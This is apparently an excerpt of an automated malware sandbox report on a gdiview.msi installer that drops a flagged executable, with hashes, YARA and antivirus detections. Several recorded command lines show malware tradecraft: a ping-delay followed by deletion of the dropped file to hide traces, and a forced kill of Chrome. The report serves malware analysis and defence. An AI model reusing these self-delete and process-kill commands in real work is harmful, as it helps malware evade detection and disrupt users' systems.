Commandline: msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
Imagebase: 0x1c0000
File size: 59904 bytes
MD5 hash: 12C17B5A5C2A7B97342C362CA467E9A2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 14:31:11
Start date: 30/01/2021
Path: C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit): true
Commandline: C:\Windows\syswow64\MsiExec.exe -Embedding 72A2D95648135F8DB654A3D18B753FD0 C
Imagebase: 0x1c0000
File size: 59904 bytes
MD5 hash: 12C17B5A5C2A7B97342C362CA467E9A2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 14:31:17
Start date: 30/01/2021
Path: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe 0011 installp2
Imagebase: 0x400000
File size: 4453376 bytes
MD5 hash: 18169F98E39AE228D131AEC477C8A2E9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000003.00000002.365832214.00000000026F0000.00000040.00000001.sdmp, Author: Florian Roth
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
• Detection: 35%, Metadefender, Browse
• Detection: 83%, ReversingLabs
Reputation: low

General

Start time: 14:31:18
Start date: 30/01/2021
Path: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe 200 installp2
Imagebase: 0x400000
File size: 4453376 bytes
MD5 hash: 18169F98E39AE228D131AEC477C8A2E9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000004.00000002.274583056.00000000026D0000.00000040.00000001.sdmp, Author: Florian Roth
Reputation: low

General

Start time: 14:31:23
Start date: 30/01/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\fnhcdXEfus.exe'
Imagebase: 0xbd0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                                                                                                                        General

                                                                                                                                                                        Start time:14:31:23
                                                                                                                                                                        Start date:30/01/2021
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff6b2800000
                                                                                                                                                                        File size:625664 bytes
                                                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high

                                                                                                                                                                        General

                                                                                                                                                                        Start time:14:31:23
                                                                                                                                                                        Start date:30/01/2021
                                                                                                                                                                        Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:ping 127.0.0.1 -n 3
                                                                                                                                                                        Imagebase:0xd00000
                                                                                                                                                                        File size:18944 bytes
                                                                                                                                                                        MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:moderate

                                                                                                                                                                        General

                                                                                                                                                                        Start time:14:31:30
                                                                                                                                                                        Start date:30/01/2021
                                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\1612045890161.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:'C:\Users\user\AppData\Roaming\1612045890161.exe' /sjson 'C:\Users\user\AppData\Roaming\1612045890161.txt'
                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                        File size:103632 bytes
                                                                                                                                                                        MD5 hash:EF6F72358CB02551CAEBE720FBC55F95
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                        • Detection: 3%, Metadefender, Browse
                                                                                                                                                                        • Detection: 14%, ReversingLabs
                                                                                                                                                                        Reputation:moderate

                                                                                                                                                                        General

                                                                                                                                                                        Start time:14:31:31
                                                                                                                                                                        Start date:30/01/2021
                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                        Imagebase:0x910000
                                                                                                                                                                        File size:232960 bytes
                                                                                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high

                                                                                                                                                                        General

                                                                                                                                                                        Start time:14:31:32
                                                                                                                                                                        Start date:30/01/2021
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff6b2800000
                                                                                                                                                                        File size:625664 bytes
                                                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high

                                                                                                                                                                        General

                                                                                                                                                                        Start time:14:31:32
                                                                                                                                                                        Start date:30/01/2021
                                                                                                                                                                        Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:taskkill /f /im chrome.exe
                                                                                                                                                                        Imagebase:0xef0000
                                                                                                                                                                        File size:74752 bytes
                                                                                                                                                                        MD5 hash:15E2E0ACD891510C6268CB8899F2A1A1
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:moderate

                                                                                                                                                                        General

                                                                                                                                                                        Start time:14:31:37
                                                                                                                                                                        Start date:30/01/2021
                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe'
                                                                                                                                                                        Imagebase:0x240000
                                                                                                                                                                        File size:232960 bytes
                                                                                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high

                                                                                                                                                                        General

                                                                                                                                                                        Start time:14:31:37
                                                                                                                                                                        Start date:30/01/2021
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff6b2800000
                                                                                                                                                                        File size:625664 bytes
                                                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high

                                                                                                                                                                        General

                                                                                                                                                                        Start time:14:31:38
                                                                                                                                                                        Start date:30/01/2021
                                                                                                                                                                        Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:ping 127.0.0.1 -n 3
                                                                                                                                                                        Imagebase:0x1e0000
                                                                                                                                                                        File size:18944 bytes
                                                                                                                                                                        MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                        General

                                                                                                                                                                        Start time:14:32:11
                                                                                                                                                                        Start date:30/01/2021
                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
                                                                                                                                                                        Imagebase:0x2b0000
                                                                                                                                                                        File size:73160 bytes
                                                                                                                                                                        MD5 hash:F0372FF8A6148498B19E04203DBB9E69
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                        • Detection: 3%, Metadefender, Browse
                                                                                                                                                                        • Detection: 2%, ReversingLabs

                                                                                                                                                                        General

                                                                                                                                                                        Start time:14:32:20
                                                                                                                                                                        Start date:30/01/2021
                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe'
                                                                                                                                                                        Imagebase:0x240000
                                                                                                                                                                        File size:232960 bytes
                                                                                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                        General

                                                                                                                                                                        Start time:14:32:20
                                                                                                                                                                        Start date:30/01/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6b2800000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 14:32:20
Start date: 30/01/2021
Path: C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit): true
Commandline: ping 127.0.0.1 -n 3
Imagebase: 0x1e0000
File size: 18944 bytes
MD5 hash: 70C24A306F768936563ABDADB9CA9108
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Disassembly

Code Analysis